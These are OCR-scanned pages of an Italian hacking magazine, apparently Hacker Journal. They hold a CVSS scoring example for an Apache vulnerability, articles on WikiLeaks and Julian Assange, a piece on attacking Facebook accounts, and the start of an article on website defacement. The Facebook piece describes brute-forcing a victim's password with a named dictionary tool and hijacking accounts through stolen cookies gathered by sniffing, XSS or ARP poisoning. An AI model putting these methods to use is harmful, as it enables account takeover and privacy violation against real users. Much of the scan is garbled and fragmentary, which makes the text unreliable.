caratteristiche tecniche o dei metodi di attacco. 


maggiore è il rischio. x 
i Not Defined (ND) 


> metrica non viene considerata nel calcolo 


Della valorizzazione. 


Collateral Damage Potential (CDP): Low. 
Target Distribution (TD): Low (0-25%). 
Riservatezza (CR): Low. 

Integrità (IR): Medium. 

Disponibilità (AR): Low. 


Vettore di rischio e livello: 


COP:L/TD:L,/CR:L/IR:M/AR:L CVSS 
Score — 1,7 


Calcoliamo ora il vettore per le 
metriche temporali. Per acquisire le 
informazioni necessarie a valorizzare 
il vettore dobbiamo effettuare alcune 
ricerche su Internet. In assenza di 
dati, a volte succede, dobbiamo 
utilizzare fonti alternative o la nostra 
esperienza. Sappiamo che il \éodice 
di vulnerabilità è: 


CVE+2002-0392 


E che utilizziamo Apaché versione 
2.0.36; con questi dati, e un po’ di 
pazienza, possiamo iniziare le nostre 
ficefche. Per prima cosa verifichiamo 
‘sul sito del MITRE le informazioni 
disponibili: 


Dai dati forniti risulta che la 
vulnerabilità è ufficialmente 
confermata, quindi: 


Exploitability = Functional 
Authentication = Confirmed 


Verifichiamo ora, sul sito ufficiale 
di Apache, la situazione delle 
opportune contromisure: 


HTTP SERVER PROJECT 


La versione da noi utilizzata è la 
2.0.36, quindi andiamo alla pagina 
relativa: 


Risulta che esiste una contromisura 
ufficializzata, quindi: 


si ottiene un CVSS Score - 1.4, che è 
il nostro rischio residuo. 

Una via più breve, ma meno ricca di 
informazioni, consiste nell’accedere 
al sito del NIST, usando come 
parametro di ricerca il CVE. 


Complexity = Official-Fix 

Riepilogando: 

| Exploitability Complexiy | 1Avthenticaton | 
‘Functional f officiata | Confirmed | 


Il vettore è il seguente: 


E:F/RL:0F/RC:( 

Il calcolo viene effettuato utilizzando 
il tool, gratuito, CVSS V2.0 Calculator 
for PC scaricabile dal sito. 
http://jvnrss.ise.chuo-u.ac.jp/jtg/ 
cvss/en/index.02.html 


Utilizzando i parametri: 


Nota: nella prima parte dell'articolo, 
pubblicata sul numero 209 di 
Hacker Journal, non è stato 
riportato tra gli autori il nome 
Francesco Merlo che risulta essere, 
tra l’altro, il principale artefice di 
questo doppio contributo dedicato 
all'analisi delel vulnerabilità. 


Ce ne scusiamo pubblicando in 
questa sede la doverosa rettifica 


{Access | Aci i Confidentiality | Integrity | Availability | 
Vector Complesity Authentication | Impact | Pie races 
Network Low None Partial Partial Partial 
Collaterali col Target 
seen 
(COP) | Distribution. rent 

(TO) 
ai 
tom |'OWZION (O | LOW LOW (O | Low /Medium | Medium | Low | 
- Exploîtability ] Complexity Authentication SE 
Funcioni | OfficialFix Confirmed 
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HACKING 
LE TECNICHE DI 


WIKILEAKS PER 
CRIPTARE LE 


INFORMAZIONI E 
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rmai tutti conoscono 
il volto di Julian 
Assange, giornalista 
portavoce ufficiale di 
Wikileaks, grazie alla 
tempesta mediatica 
scatenatasi nelle ultime settimane 
a seguito della pubblicazione sul 
suo sito dei documenti riservati 
relativi alla guerra in Afghanistan 
e alle relazioni diplomatiche degli 
Stati Uniti degli ultimi cinquanta 
anni. Questa seconda pubblicazione 
ha portato alla luce lo scorso 28 


Sa pi 
inci 


novembre, ben 251.287 documenti 
confidenziali, denominati cable, 
decretando una crisi diplomatica di 
imprevedibili conseguenze 

Poco o nulla è stato detto però dai 
media del lato tecnico relativo alla 
struttura del sito web, degli hacker 
che lo gestiscono e degli attacchi 
che stanno sconvolgendo internet. 
Proprio per la sua natura, infatti, 
Wikileaks non parla molto delle 
sue difese, mentre rappresenta lo 
stato dell’arte per la gestione e la 
protezione delle informazioni 


IL BUNKER 


Wikileaks.org è stato fondato 

da dissidenti cinesi, giornalisti, 

matematici e tecnologi degli 

Stati Uniti, Cina, Taiwan, Europa, 

Australia e Sud Africa ed è divenuto 

operativo agli inizi del 2007. Il 

i comitato di coordinamento include 

i giornalisti, crittografi, un analista 

dei servizi segreti degli Stati Uniti 

e rifugiati politici cinesi, russi e 
tibetani. 


N Ecco come si presenta l’accesso al sito 
WR di Pionen: all'interno della montagna è 
alfliti presente it ata conter. 
MOT 
La sua natura giudicata apertamente 
pericolosa, ne ha costituito sin 
dall'inizio. un bersaglio per gruppi 
di pirati informatici al soldo o 
meno delle intelligence di tutto il 
I mondo. Per tutelarsi da possibili 
| oscuramenti totali, già lo scorso 
agosto era stato diffuso tramite 
sito web e reti p2p tutto l'archivio 
digitale di Wikileaks cifrato in 
AES256, senza rilasciare la 
password (archivio da 1,4Gb noto 
come Wikileaks Insurance File). 
Essa sarebbe stata resa pubblica 
hel caso in cui il sito fosse stato 
compromesso. Qualcuno ha 
ipotizzato che fosse un bluff, 
ma di certo ha funzionato come 
deterrente. 
Wikileaks, da sempre soggetto a 
questi attacchi, per mantenersi 
online deve essere continuamente 
monitorato e ha come location 
principale i server del provider 
Banhof (www.bahnhof.se), 
all'interno di un bunker nella catena 
montuosa chiamata Pionen, da 
i cui prende il nome. Si tratta di un 
vero e proprio bunker anti attacco 
i atomico degli anni Settanta che è 
| stato convertito in data center. Tra 


ppggrifiti) 


le caratteristiche peculiari di questa 
location, oltre la difesa naturale 

da possibili attacchi aerei, vi è 
anche l’autosufficienza energetica 
grazie alla presenza di generatori di 
backup progettati per sottomarini 

e basati su motori diesel tedeschi, 
per il funzionamento dell’impianto 
elettrico e idraulico. 


bunker. Sulio sfondo si vedono i rack 
che contengono i server tra cui anche 
Wikileakes. 


Nonostante la location di tutto 
rispetto, i server per la natura stessa 
di internet, non possono essere 
immuni ad attacchi Ddos e proprio 
in questi giorni sono nati numerosi 
nuovi mirror di wikileaks, a seguito 
della chiusura dei principali siti 
wikileaks.org e wikileaks.net su 
pressione del governo americano, 
nel tentativo di oscurare e zittire 
IUISICELGA 

E' possibile trovare facilmente 

uno di questi mirror ufficiali e 

non, andando all'indirizzo http:// 
Wikileaks.info, attualmente attivo, 
mentre è stato aperto un nuovo 
indirizzo ufficiale con il dominio 
wikileaks.ch, con segnalati tutti i 
mirror ufficiali all'indirizzo wikileaks. 
ch/mirrors.html. Per l'esattezza si 
tratta di 1559 mirror, numerosi dei 
quali implementano l’IPv6! 


LA CENSURA 
E L'ANONIMATO 


Wikileaks è considerato una 
concreta minaccia alla sicure. 
degli Stati Uniti. A dirlo sono stati 
proprio i servizi segreti americani 
che hanno stilato un dossier 
riservato di 32 pagine datato 18 
marzo 2008, dal titolo “Wikileaks.org 


- An Online Reference to Foreign 
Intelligence Services, Insurgents, 
Or Terrorist Groups?” (traduzione: 
“Wikileaks.org — Un riferimento 
online per servizi segreti stranieri, 
ribelli o gruppi terroristici?”) che è 
stato pubblicato online proprio da 
Wikileaks lo scorso 15 marzo, con 
notevole eco mediatica. 

Tale documento rappresenta forse 
l’approfondimento più accurato 

su cos'è tecnicamente Wikileaks 

e come funziona la raccolta e 
diffusione delle informazioni 
riservate operate dai suoi 
sostenitori, ovviamente dal punto di 
vista dei servizi segreti americani. 


Assange si è guadagnato la copertina 
emblematica del Time che ha utilizzato la 
bandiera americana per chiudergli la bocca. 


Alla chiave del successo di 
questa raccolta c'è la garanzia 
all’anonimato delle fonti che 
risiedono in tutto il mondo e 
possono fornire le informazioni 
tramite internet. Come si legge 
nel documento, chiunque può 
postare informazioni grazie 

al sistema Wiki senza alcuna 
revisione editoriale o supervisione 
volta ad appurare la verità delle 
notizie riportate. Un sistema senza 
censure in pratica. E' evidente 
che tale struttura possa prestarsi 
a facili critiche, dal momento che 


i contenuti (apparentemente) non 
sono sottoposti ad alcuna verifica, 
tuttavia è proprio l'assenza di 
censura e la garanzia dell’anonimato 
che ne ha decretato la potenza 
esplosiva dal punto di vista 
mediatico. E Wikileaks assicura di 
effettuare opportune verifiche sui 
documenti ricevuti. Molti paesi, già 
prima del “Cable-gate”, ossia la 
diffusione dei messaggi scambiati 
tra i diplomatici americani negli 
ultimi 50 anni, avevano deciso di 
bloccare l’accesso a Wikileaks. 
org. Tra questi la Cina, Israele, 
la Corea del Nord, la Russia, la 
Tailandia e lo Zimbabwe. Cina, 
Israele e Russia pretendono infatti 
di poter modificare autonomamente 
i contenuti pubblicati per perseguire 
| le fonti, nonostante Putin dichiari 
inaspettatamente di essere 
contrario all'arresto di questi 
giorni di Assange. L'anonimato 
offerto da Wikileaks è garantito 
dall’utilizzo delle moderne 
tecnologie, ma soprattutto dalla 
fiducia che lega chi pubblica e chi 
fornisce le informazioni riservate. 
Per proteggere l'anonimato 
sono impiegate le piattaforme di 
Wiki e MediaWiki (alla base del 
funzionamento del sito web) e 
i protocolli OpenSSL, FreeNet, 
TOR, e crittaggio PGP per cifrare 
e rendere impossibile risalire al 
punto di accesso iniziale alla rete 
dei contenuti diffusi. Oltre alla 


diffusione via internet, le fonti 
‘anonime delle informazioni possono 
trasmettere ovviamente i contenuti 
tramite vecchi e sicuri metodi, come 
quello di inviare tramite posta CD o 
DVD cifrati ai volontari che lavorano 
per Wikileaks e che proteggendo 
l'origine delle informazioni, girano 

a loro volta i contenuti a chi è 
autorizzato a pubblicare i contenuti 
online. Una catena di tramissione 
basata chiaramente sulla fiducia che 
le parti ripongono tra loro. 


| DOCUMENTI 


La quantità dei documenti fuoriusciti 
è talmente ampia da aver richiesto 
lo sviluppo di software appositi 

da parte di Assange e dei suoi 
collaboratori, volti a catalogare e 
indicizzare le informazioni. Tra le 
funzioni base di questi software ad 
esempio, l'espansione automatica 
degli innumerevoli acronimi utilizzati 
ad esempio per i documenti riservati 
sulla guerra in Afghanistan. 

Tramite un'intensa attività di SQL 

e di pubblicazione di articoli è 

ora disponibile un database che 
permette di svolgere ricerche 
approfondite sulle oltre 2000 pagine 
riservate, ora a disposizione di 
chiunque. E le informazioni rivelate 
sono particolarmente esplosive. 

Per fare qualche esempio, tra le 


informazioni portate alla luce: 
centri nevralgici dei servizi segreti 
‘americani, operazioni su detenuti e 
presunte violazioni di diritti umani 

a Guantanamo, informazioni sul 
Dipartimento di Stato, le Forze Aree, 


Stati Uniti, sulla polizia irakena e 

le forze di coalizione della Polonia, 
Danimarca, Ucraina, Lettonia, 
Slovacchia, Romania, Armenia, 
Kazakistan e El Salvador che hanno 
svolto servizio in Iraq e Afghanistan, 
quasi l'intero ordine di battaglia 
delle forze americane in Iraq e 
Afghanistan alla data di Aprile 2007; 
presunte rivelazioni relative alla 
violazione da parte degli Stati Uniti 
della convenzione sull'uso delle armi 
chimiche in Iraq e Afghanistan. 
Dopo aver indicizzato i contenuti, 

gli sviluppatori software hanno 
rintracciato in rete gli acronimi 
utilizzati dalla NATO per validare a 
campione le pagine. Manualmente 
sono state poi create delle liste di 
parole chiave utili a navigare tra i 
contenuti. Con l'utilizzo di scripting 
basato su VIM, PERL e programmi 
Python, tutto il materiale è stato poi 
organizzato in fogli di calcolo che 4 
hanno permesso una visualizzazione Ù 
semplificata. Con successive y 
fusioni, sono stati inclusi fogli di 
calcolo della logistica della NATO 
e acronimi utilizzati dalla logistica 
militare americana e il tutto è stato 
riversato nuovamente in SQL. 
Questo ha permesso ad esempio pi 
di ottenere informazioni accurate 

di tipo economico sugli apparati 

militari e sulle operazioni stesse di 

guerra. 


GLI ATTACCHI 
FSREORERTIORLI PT FEFEASIFEVTAFIVIIV IRA CERENALLESANTVARINI 


Il dossier si spinge ben oltre l'analisi 
di Wikileaks definendo possibili 
falle che potrebbero portare al 
controllo del sito web. Viene 
chiaramente evidenziato che le 
tecnologie utilizzate per rendere le 
comunicazioni cifrate hanno delle 
vulnerabilità che possono essere 
“exploitate” e che organizzazioni 
dotate di tecnici opportunamente 
‘addestrati, in possesso di sistemi 
e software appopriati, potrebbero 


portare a buon fine attacchi in grado 
di prendere il controllo del sito. Come 
a dire tra le righe, che i servizi segreti 
sono pronti a intervenire per spegnere 
immediatamente Wikileaks. 


E' inoltre evidenziato che analisi 
digitali di tipo forense sui documenti 
e sulle reti coinvolte per la 
trasmissione dei dati potrebbero 
permettere di risalire alle località 

di origine utilizzate per diffondere 

i contenuti riservati fuoriusciti e 


Operation: Parback 


rintracciare quindi i responsabili di 
tali azioni. 


Ciò nonostante, Wikileaks assicura 
i che le competenze necessarie 


gpl 


per risalire agli indirizzi IP dei 
computer coinvolti, fino ai MAC 
delle schede di rete di partenza, 
sono tali da essere in possesso dei 
soli programmatori che si occupano 
di Wikileaks. Un'affermazione forse 
azzardata, ma che rende bene 
l'idea del livello di esperienza dei 
collaboratori di Julian Assange. 

Lo stesso sito web ha alle spalle un 
lavoro continuo volto ad assicurarne 
la disponibilità online, nonostante i 
continui attacchi informatici. 

Sul versante politico, diverse nazioni 
tentano di rendere illegale la stessa 
consultazione del sito web e il 
download dei contenuti in esso resi 
disponibili, bloccandone l’accesso. 
Su quello giurisprudenziale, al 
contrario, ci si chiede anche 

negli Stati Uniti se debba essere 
costituzionalmente permesso 

di poter accedere a queste 
informazioni in relazione alla libertà 
di parola e di stampa. 


IL FUTURO 


Wikileaks aspira a divenire una voce 
autorevole indipendente e priva di 
censure cui chiunque può rivolgersi 
per denunciare tutte quelle notizie 
che i potenti più o meno in vista 
vorrebbero fossero taciute. 
Wikileaks ora ha aperto anche uno 
spiraglio sul mondo nascosto dei 
servizi segreti e delle diplomazie, 


rendendo palese agli occhi del 
mondo le forze in gioco per gli 
equilibri politici del pianeta. Gli 
attacchi continui perpetrati nei 
confronti del sito web, l'arresto 

del suo portavoce, la chiusura dei 
conti bancari e degli account pay- 
pal dei sostenitori di Wikileaks 
danno invece la dimensione degli 
interessi economici coinvolti dietro 
a tali movimenti politici. E ora il 
mondo è in attesa di conoscere le 
sorti di Julian Assange, attualmente 
detenuto in Inghilterra, ma per il 
quale probabilmente si sta cercando 
il modo di estradarlo negli USA. 

AI di là delle informazioni rilasciate 
sembra sempre più necessario 
assicurare la massima libertà a 
internet come mezzo principe 

per la libertà di espressione a 
disposizione di ognuno. Forse sarà 
proprio il caso di Wikileaks a creare 
nell'opinione pubblica un forte 
desiderio di indipendenza della rete 
da tutti i governi. Quello che ogni 
hacker vorrebbe. 


POTORTEGLUO 


Los 


di/Massimiliano: Rinaldi; 
7 ine@hackerjournali: 


JULIAN PAUL ASSANGE: 
VITTIMA © CARNEFICES 


WIKICEARS 
FIGURA 
CONTROVERSA 

E CARISMATICA 
OSANNATA E 
ALTRETTANTO 
CRITICATA, JULIAN 
ASSANGE E’ UNA 
DELLE ICONE 

PIU IMPORTANTI 
DELLA NUOVA 
EPOPEA DIGITALE. 


ikiLeaks is a 
non-profit media 
organization 
dedicated to 
bringing important 
news and 
information to the public. We provide 
an innovative, secure and anonymous 
way for independent sources around 
the world to leak information to our 
journalists. We publish material 
of ethical, political and historical 
significance while keeping the 
identity of our sources anonymous, 
thus providing a universal way for 
the revealing of suppressed and 
censored injustices. Questo è il 
messaggio che campeggia nella 
home page di Wikileaks il sito che 
è riuscito a sollevare uno tsunami 
mediatico di proporzioni inaudite 
pubblicando documenti diplomatici 
statunitensi riservati e confidenziali 
che hanno sollevato, per il contenuto 
spesso “imbarazzante”, una serie 
di polemiche a catena. WikiLeaks 
(dall’inglese “leak”, “perdita”, “fuga 
[di notizie]”) è un’organizzazione 
internazionale senza scopo di lucro 
che riceve in modo anonimo, grazie FREEDOM! FOREVERI 
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‘a un contenitore (drop box) protetto 
da un potente sistema di cifratura, 
documenti coperti da segreto (segreto 
di stato, segreto militare, segreto 
industriale, segreto bancario) e poi li 

i carica sul proprio sito web. WikiLeaks 
riceve, in genere, documenti di 
carattere governativo o aziendale da 
fonti coperte dall'anonimato. 


WIKILEAKS 


rarporezzente 


sei 


î Dietro il sito di Wikileaks c'è la figura 
î controversa di Julian Paul Assange, 
dei quali dedicati proprio all'etica 
hacking. Assange giovanissimo entra 
bh st ottanta, di “International Subversives” 
(Sovversivi internazionali) un gruppo 
lim di hacker internazionali ben noto alle 
Î 
ng di “Mendax” (da una frase di Orazio: 
LA “magnificamente mendace"). 
programmatore, attivista, però forse 
AA la parola che meglio lo descrive 
n sistema, lo combatte. Ne combatte le 
regole e proprio per questo i suoi guai 
Nel 1991 subisce un'irruzione nella 
) I) sua casa di Melbourne da parte della 
è quella di avere violato, via modem, 
diversi computer appartenenti a 
Ù entrato nel sistema informatico del 
Dipartimento della Difesa americano 
periferica che non ha violato i centri 
hevralgici del sistema). Nel 1992 gli 
di hacking. Assange è condannato, 
ma in seguito è rilasciato per buona 
multa di 2.100 dollari australiani. 
Tanto per rimanere in tema nel 
open source chiamato software 
Nel 1997 collabora alla stesura 
‘ Hacking, Madness and Obsession 
# ‘on the Electronic Frontier. Dopo un 
fruttuoso (non coronato dalla 
laurea), tra il 2003 e il 2006, presso 


australiano, 39 anni, buona parte 
‘a far parte, verso la fine degli anni 
cronache. Egli utilizza lo pseudonimo 
ww Assange viene definito Giornalista, 
è anarchico. Non si riconosce nel 
con la giustizia iniziano molto presto. 
|! polizia federale australiana. L'accusa 
N di un'università australiana e di essere 
(peraltro un’incursione definita 
vengono rivolti 24 capi di accusa 
‘i condotta, dopo aver pagato una 
1995 programma un port scannino 
del libro Underground: Tales of 
periodo di studio non particolarmente 
la facoltà » fisica e matematica 


all’Università di Melbourne, il suo 
impegno si rivolge decisamente 

al sito WikiLeaks.org di cui è tra i 
promotori nel 2007. Tecnicamente 
Assange si definisce “solamente” 
caporedattore di WikiLeaks ma i suoi 
meriti e, soprattutto i suoi “poteri” 
vanno ben oltre. WikiLeaks è una sua 
creatura fortemente compenetrata 
nel suo modo di essere, spesso 

al di fuori delle regole statutarie, 
questo appare ben evidente a tutti, 
specie i suoi detrattori e alla giustizia 
internazionale. 


GRANDE 
VISIBILITÀ, GRANDI 
PROBLEMI 


Da un grande potere derivano 
grandi responsabilità. Lo dice Peter 
Parker, al secolo l'Uomo Ragno, 
e a questa massima non sì può 
sottrarre neanche Julian Assange i cui 
piccoli guai con la legge diventano 
decisamente più consistenti mano 
mano che la popolarità di WikiLeaks 
cresce. Il 18 novembre 2010 il 
tribunale di Stoccolma spicca un 
mandato d’arresto in contumacia nei 
suoi confronti con l'accusa dì stupro, 
molestie e coercizione illegale. La 
vicenda viene poi ridimensionata 
nei contorni. In realtà ad Assange 
sarebbe stato contestato il rifiuto 
di sottoporsi ad un controllo 
medico sulle malattie sessualmente 
trasmissibili dopo aver avuto rapporti 
sessuali non protetti con due donne 
consenzienti, reato punibile in Svezia. 
Una delle donne coinvolte è Anna 
Ardin, una militante femminista 
e segretaria dell’associazione 
Brotherhood Movement. Il 20 
novembre viene spiccato, sulla scorta 
di questa accusa, un mandato di 
arresto internazionale tramite Interpol 
dalla forza di polizia svedese. In 
aggiunta è stato diramato un mandato 
di arresto nell'Unione Europea tramite 
il Sistema di Informazione Schengen. 
Si arriva così alla data fatidica: il 28 
novembre 2010. WikiLeaks rende 
di pubblico dominio oltre 251.000 
documenti diplomatici statunitensi, 
molti dei quali etichettati come 
“confidenziali” o “segreti” che 
destano un grandissimo clamore. Si 


ipotizza che con la pubblicazione dei 
documenti siano state violate una 
serie di leggi internazionali, ma siamo 
ancora nel campo delle ipotesi tutte 
da verificare. Quello che è invece 
concreto è l'arresto di Assange 

che il 7 dicembre 2010 Assange si 
presenta spontaneamente negli uffici 
di Scotland Yard e viene trattenuto 
in seguito al mandato di cattura 
internazionale per i fatti a sfondo 
sessuale. Di fatto l'unica accusa 
realmente pendente ad oggi sul suo 
capo. Infine, il 16 dicembre, viene 
scarcerato a seguito del pagamento 
di una cauzione di 200.000 sterilne, 
messe insieme, almeno così si dice, 
in massima parte dai suoi sostenitori. 
Ora l'udienza del processo a suo 
carico è attesa per l'11 Gennaio. 


VITTIMA O 
CARNEFICE? 


La risposta non è semplice. L'attività 
dì Assange è indubbiamente molto 
fastidiosa per i “potenti” di ogni 
paese del mondo e le finalità etiche 
che la sorreggono di base si possono 
considerare nobili. Ma ci sono delle 
‘ombre che si fa fatica a dissipare 
completamente. Qualcuno ipotizza 
che tutto questo teatrino sia stato 
allestito ad arte per raccogliere fondi 
milionari, quindi anche per scopi 

di lucro. C'è poi chi alza il dito sui 
sostenitori e ipotizza che alcuni 
finanziatori siano organizzazioni, 
anche grossi editori, i cui scopi 
potrebbero essere quelli di utilizzare 
l'attività investigativa del sito per i 
propri vantaggi. Insomma bianco 

o nero? Paladino o speculatore? 

Ai posteri la sentenza. Intanto sul 
sito WikiLeaks si può scaricare un 
documento compresso di qualche 
MB che contiene tutti i 251.000 
torrent che consentono di scaricare 
altrettanti documenti, tutti quelli finora 
resi pubblici dal sito. Un'ondata di 
rivelazioni difficile da contrastare 
perché non basta più chiudere 
WikiLeaks per arginare la diffusione 
dei documenti. Il sito è ripreso da 
migliaia i altri siti, i torrent viaggiano 
e si diffondono in rete come 
un'epidemia che difficilmente potrà 
essere arrestata. 


iciamocelo: nolenti 

o volenti i social 

network sono un 

successo planetario 

che prescinde dalla 
qualità e quantità di cose scritte 
fuori e dentro. Facebook (FB) è 
forse il fenomeno più clamoroso, 
per la crescita continua di persone 
connesse da tutto il mondo e i 
fenomeni di aggregazione che 
raccolgono individui fisicamente e 
culturalmente distanti. 
Ma FB è pur sempre 
un'applicazione software e come 
tale soggetta a bug, falle di 
sicurezza e anomalie. Vediamo cosa 
si rischia quindi a utilizzarlo e a 
comunicare al social network foto e 
informazioni personali. 


HACK DI UN INVITO 


Può capitare che se usiamo da 
tempo internet abbiamo diversi 
indirizzi e-mail che nel tempo 


ATTACKING. 
TI FIDI DI FACEBOOK? 


EULO COME BUCARE IL 


sar 
abbiamo dato ad amici, colleghi, 
parenti e così via e che quindi 
non tutti si siano sincronizzati con 
l'ultimo account che stiamo usando 
come ufficiale, ad esempio su 
Gmail. Disgrazia vuole che qualcuno 
con cui desideriamo assolutamente 
diventare amici su FB ci invii 
l'invito proprio su un account 
che vorremmo chiudere, ma non 
possiamo. Potremmo provare 
ad aggiungere il nostro amico al 
nostro profilo FB cercandone nome, 
cognome e-mail. Ma potremmo 
‘anche ottenere centinaia di risultati, 
o nessuno perché magari ha scelto 
uno pseudonimo e non i dati reali. 
Perdiamo quindi la possibilità di 
agganciarlo al nostro network dove 
siamo registrati con un indirizzo 
diverso? Per nulla, basta un minimo 
di hacking. 
L'URL che ci ha inviato FB via 
e-mail ha un formato simile a 
questo: 
http://www.facebook.com/p.php?i 
=VKXKKKKAXEK=YYYYYYYYYY&r 
&v=2 


Dove XXXXXXXXX rappresenta 

l'ID su FB dell’utente che ci 

ha contattato. Con questa 
informazione possiamo raggiungere 
direttamente il suo profilo su FB 
sostituendolo all’indirizzo sotto 
http://www.facebook.com/profile. 
php?id=XXXXXXXXX 

Una volta aperto, clicchiamo su 
“Add as Friend” e dopo essere stati 
accettati dal nostro amico possiamo 
cestinare il vecchio invito. La 
protezione è effettivamente debole, 
trasmettendo all’esterno del social 
network un identificativo privato. 
Restano tuttavia le difese interne 
basate sull'autenticazione dei due 
utenti coinvolti. 


CRACK DELLA 
PASSWORD 


Qualcuno si aspetterà di venire 
a sapere prima o poi che ci sia 
una grave falla di sicurezza o 

magari grazie a una mano data 


da Microsoft, siano state lasciate 
delle vulnerabilità intrinseche 
che permettono di accedere 
liberamente agli account di FB. 
Invece senza troppe speculazioni, 
è stato realizzato un piccolo tool 
scritto in Java che fa il suo dovere 
alla vecchia maniera, con un brute- 
force. 
Può utilizzare vocabolari di parole 
già pronte ed è gratuito. Si chiama 
| Facebooz (http://facebooz.goldeye. 
info) e gli occorre solamente un 
Java Runtime-Environment per 
| funzionare localmente. Si inserisce 
l'e-mail della vittima, si carica il 
dizionario che si vuole utilizzare 
e lui parte, incurante delle pause 
generate dalla controffensiva di FB 
che allungheranno i tempi, ma si sa 
che la pazienza è la virtù dei forti! 
Questo per ricordare che una 
password non è mai troppo 


complicata! Ed è bene usare anche . 


i caratteri più strani creando parole 
0 frasi senza senso. — 


Password File 


Semplice 


di errore di FB 
per tentare più 
volteidî accedere 
all’aecount; 
l'utilizzo dei 
dizionari permette 
di tarare l'attacco 
sulla vittima. 


CONTROLLO 
DI UN ACCOUNT 


Esistono poi metodi più raffinati 
per sconvolgere la tranquillità di 
un utente FB, che basano l’attacco 
sui cookie che sono generati man 
mano che utilizziamo il social 
network per prendere contatto 

con gli altri utenti. In pratica può 
essere realizzato un vero sniffing 
di credenziali d'accesso da remoto 
basandoci sulle informazioni 

che FB ci permette di ottenere 
sulla vittima. Il risultato finale 

può essere quello di prendere 

il controllo di un account su FB 


effettuato 
‘alcun crack 
dell'account. 


senza conoscere la password di 
accesso e senza che la vittima se 
ne accorga. 

Per avere i cookie ogni metodo 
può andare bene: sniffando il 
traffico, XSS, social engineering, 
ARP Poison-Sniffing. Basta 
loggarsi in FB con il proprio 
account e sniffare i propri cookie 
o raccoglierne di nuovi man mano 
che entriamo in contatto con 
l’obiettivo. 


Alla fine avremo raccolto i dati 
necessari da dare in pasto a 

un tool abbastanza potente 
chiamato FBController (http:// 
my.opera.com/quakerdoomer/ 
blog/fbcontroller-v3-0-facebook- 


SER) Passando 

un file che 
contiene i cookie 
FBController 
riesce a sferrare 
i suoi attacchi 
mirati. 


o esempio viene mostrato come è possibile 
ì una chat al posto della vittima. 


protezione della privacy 


TENIE 


ri icostruire la rete di connessioni che potrebbero 


In questo esempio viene mostrato come sia possibile 
alterare i settaggi scelti dalla vittima in merito alla 


“fegarci a un utente veramente distante da noi. 


control-utility-version-3-0). 
Tramite questo strumento è 
possibile prendere il controllo di 
qualunque account ad esempio 
per controllarne la lista degli 
amici online o avviare una 


conversazione come fossimo 
quell’utente e soprattutto inviare 
e ricevere messaggi al suo posto. 


E' possibile vedere la cronologi 
delle conversazioni passate 
dell'utente vittima con | suoi 
amici a prescindere che 
essi siano online o offline, 
effettuare “Poke” ai suoi amici 
e modificare i parametri relativi 
alla Privacy. s 
Nella versione 3.0 di FBGontroller 
viene poi inserito il Facebook 


Di 


Nexus Explorer (attualmente in 
beta), che funziona, dé come'un 
motore di ricercapermettè di 
individuare inti di FB' a partire 
i f amici, restituendo 


ionalità simili 
friend” che 

ta a un solo 

in Nexus non ci 
la beta attuale il 
‘aneamente a uno 


‘salto, mentrà 
sono limiti (i 
limite è ter 
comunqui 


Il funzionamento è molto 
semplice: basta definire l'ID 
di partenza e un ID obiettivo, 
oltre a indicare la profondità 
della ricerca che si intende 


ion 
petra 


raggiungere. Per ogni nuovo ID 
raggiunto vengono estratte le 
liste di amici e possono partire 
nuove ricerche in modo ricorsivo. 
Questo quindi negando di 

fatto il controllo di FB sulle 
relazioni, la chiave centrale 

del funzionamento dei social 


CONCLUSIONI 


Questa piccola panoramica 
voleva soltanto mostrare alcune 
delle debolezze inevitabili di un 
social network come FB. 


E rie6rdando che nel campo degli 
OST'il progressivo affermarsi di 
indows come sistema desktop 
è coinciso con l'aumento 
esponenziale di virus e attacchi 
diretti verso questa piattaforma, 
assisteremo molto presto al 
propagarsi di minacce serie 
che funzionano grazie alle API 
dei social network e riescono 
a infettare molte più vittime, 
spesso poco esperte e quindi più 
vulnerabili, in brevissimo tempo. 


Agli amministratori di rete 

l’arduo compito di far conciliare 
informazione e prevenzione degli 
utenti per i quali si è responsabili. 
Alle riviste come la nostra quella 
di suonare campanelli di allarme. 


IL 


ACCIAMENTO DI UN 


SITO E SPESSO SOLO UN 
ATTO DIMOSTRATIVO; ALTRE 


VOLTE NASCONDE REALTÀ PIL 


COMPLESSE. 


efacciare è una parola 
che ha cominciato ad 
assumere una certa 
popolarità intorno alla fine 
degli anni '90, quando il fenomeno 
internet ha cominciato a crescere 
e, sebbene sia una terminologia 
di strettissima attualità, fatica 
ancora a trovare uno spazio nei 
dizionari come neologismo. Con 
Defacciamento si intende, in 
termini davvero generali, spesso 
la semplice e sola sostituzione 
della pagina di index di un sito 
con un'altra di contenuti diversi 
caricata proprio dal “defacciatore”. 
| contenuti della nuova pagina di 
indice caricata possono essere 
davvero molteplici, dipende 
tutto sommato da quali sono le 
intenzioni di chi porta questo 
genere di attacchi, si va dalla 
schermata burlesca fine a se 
stessa a veri e propri proclami e 
atti di denuncia. 
Ma questa è evidentemente solo 
la punta dell'iceberg. Il fenomeno 
del Defacement ha implicazioni 
spesso più profonde. | siti web 
che subiscono pesanti attacchi 
di defacement sono altre volte 
trasformati in veri e propri nodi 
di botnet, backdoor e account 
di shell venduti al mercato nero: 
questo è ciò che quotidianamente 
avviene su Internet. Il presente 


articolo analizza le modalità à 
strumenti utilizzati dai “defacet 
per condurre i loro attacchi nei 
confronti dei siti web, fornendo 
al contempo preziosi con: Î 
evitare di divenire noi stessi facil 
bersaglio di tali malintenzionati. 


IL “EDEFACCIATORE” 


Il defacer, in genere, non presta 
mai particolare attenzione al 

tipo di sito web da sottoporre ad 
attacco; il suo scopo principale 
rimane quello di individuare e 
sfruttare al meglio le vulnerabilità 
presenti in certi server, per 

poi modificare il contenuto o 
l'aspetto visivo dei siti web violati, 
oppure lasciare tracce tangibili 
della “cortese” visita effettuata, 
caricando magari nel server 
compromesso un file che evidenzi 
l’azione di defacing appena 
compiuta. In realtà nessuno sa 
spiegare concretamente perché 

i defacer agiscano in tal modo, 
visto che la loro losca attività non 
sembra produrre alcun evidente 
profitto in termini pecuniari. 
Esplorando tuttavia gli appositi 
archivi online che raccolgono 

e catalogano gli innumerevoli 


INTERNET MEDIO 


diSpirit; 
redazione@ hackerjoi 


ad 
“hack 
tali atti) 
precisaré 

conducono 

nei confronti d 

sfruttano al meglio 

tecniche acquisite pei 

azioni di hacking ben mirate. Gli 
hacker cercano inoltre di proposito 
di evitare che i proprietari dei si 
compromessi possano'rendersi in 


qualche modo conto dell'attacco 
subito; al contrario, essi fanno 
sempre tutto il possibile per 
nascondere o cancellare ogni 
traccia o evidenza dell'attacco 


portato. t 


DEFACEMENT 
TATE I 


Gli attacchi eseguiti dai defacer 
sono comunemente definiti con 
il termine di “defacemeht”; in 
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| Spirit —e 


